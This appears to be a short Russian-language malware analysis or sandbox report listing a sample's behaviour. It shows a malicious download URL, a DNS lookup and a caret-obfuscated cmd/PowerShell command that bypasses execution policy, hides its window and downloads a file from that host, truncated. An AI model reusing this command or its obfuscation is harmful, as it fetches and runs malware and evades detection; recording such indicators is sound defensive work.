Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWE^r^SheLL.EXE^ -^E^xecutiO^nP^OL^I^CY^ bY^pasS -^N^O^Pro^f^iLe ^-w^IndO^W^s^ty^L^e hid^DeN ^(NeW^-^obJEC^t ^sys^t^em^.^N^ET^.W^EBc^LIenT)^.dO^Wnl^oaDFi^le(^'http://zussipussicsc...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "P^OWE^r^SheLL.EXE^ -^E^xecutiO^nP^OL^I^CY^ bY^pasS -^N^O^Pro^f^iLe ^-w^IndO^W^s^ty^L^e hid^DeN ^(NeW^-^obJEC^t ^sys^t^em^.^N^ET^.W^EBc^LIenT)^.dO^Wnl^oaDFi^le(^'http://zussipussicsc...' (со скрытым окном)